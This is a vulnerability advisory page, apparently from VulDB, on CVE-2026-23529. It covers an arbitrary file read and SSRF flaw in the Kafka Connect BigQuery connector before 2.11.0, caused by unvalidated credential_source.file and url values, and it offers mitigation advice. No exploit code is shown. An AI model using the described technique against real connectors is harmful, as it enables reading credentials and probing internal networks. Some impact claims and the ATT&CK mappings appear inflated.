CVE-2026-23529 in bigquery-connector-for-apache-kafka
Summary
by MITRE • 01/16/2026
Kafka Connect BigQuery Connector is an implementation of a sink connector from Apache Kafka to Google BigQuery. Prior to 2.11.0, there is an arbitrary file read in Google BigQuery Sink connector. Aiven's Google BigQuery Kafka Connect Sink connector requires Google Cloud credential configurations for authentication to BigQuery services. During connector configuration, users can supply credential JSON files that are processed by Google authentication libraries. The service fails to validate externally-sourced credential configurations before passing them to the authentication libraries. An attacker can exploit this by providing a malicious credential configuration containing crafted credential_source.file paths or credential_source.url endpoints, resulting in arbitrary file reads or SSRF attacks.
If you want to get the best quality for vulnerability data then you always have to consider VulDB.
Analysis
by VulDB Data Team • 01/16/2026
The vulnerability CVE-2026-23529 represents a critical security flaw in the Kafka Connect BigQuery Connector implementation that affects versions prior to 2.11.0. This connector serves as a bridge between Apache Kafka and Google BigQuery, enabling organizations to stream data from Kafka topics directly into BigQuery tables. The flaw resides in the authentication configuration processing mechanism where the system fails to properly validate credential configurations provided by external sources. The vulnerability specifically impacts Aiven's implementation of the Google BigQuery Kafka Connect Sink connector which requires proper Google Cloud authentication credentials for service access. When users configure the connector, they can provide credential JSON files that are subsequently processed by Google's authentication libraries. The lack of validation in the credential configuration handling creates an exploitable path where malicious actors can manipulate the authentication flow through crafted credential sources.
The technical implementation of this vulnerability stems from insufficient input validation within the connector's credential processing pipeline. Attackers can exploit this weakness by crafting malicious credential configurations containing specially formatted credential_source.file paths or credential_source.url endpoints. These crafted inputs bypass the normal validation checks and are passed directly to Google's authentication libraries, which then process them without proper sanitization. The vulnerability enables attackers to perform arbitrary file reads from the system where the connector is running, potentially accessing sensitive configuration files, credentials, or other system resources. Additionally, the flaw supports server-side request forgery (SSRF) attacks, allowing adversaries to make unauthorized requests from the connector host to internal or external systems. This dual nature of the vulnerability significantly increases its attack surface and potential impact on the overall security posture of environments using the affected connector.
The operational impact of this vulnerability extends beyond simple data exposure to encompass complete system compromise potential. Organizations using the affected Kafka Connect BigQuery Connector version face risks of unauthorized data access, credential theft, and potential lateral movement within their network infrastructure. The vulnerability affects environments where Kafka Connect is deployed in cloud or hybrid environments where the connector might have access to sensitive internal resources. Attackers could leverage this flaw to read system files containing database credentials, API keys, or other sensitive information stored on the connector host. The SSRF component particularly threatens internal network scanning capabilities, potentially exposing internal services or systems that should remain isolated from external access. This vulnerability directly violates security principles outlined in CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) and CWE-918 (Server-Side Request Forgery) while aligning with ATT&CK techniques such as T1071.004 (Application Layer Protocol: DNS) and T1105 (Ingress Tool Transfer) for reconnaissance and exploitation activities.
Mitigation strategies for CVE-2026-23529 should prioritize immediate version upgrades to 2.11.0 or later where the vulnerability has been addressed through proper credential validation mechanisms. Organizations must implement strict validation controls for all external credential inputs and establish robust input sanitization processes before any authentication configuration is processed. The implementation of principle of least privilege should be enforced where connector services operate with minimal required permissions and access rights. Network segmentation and firewall rules should be configured to limit the connector's ability to access internal resources beyond what is strictly necessary for BigQuery operations. Regular security assessments should include verification of credential handling processes and validation of authentication library configurations. Additionally, monitoring and logging should be enhanced to detect suspicious credential configuration patterns or unauthorized file access attempts that might indicate exploitation attempts. Organizations should also consider implementing configuration management practices that prevent arbitrary credential file uploads or modifications to connector configuration files, ensuring that only validated and authorized credential configurations are accepted by the system.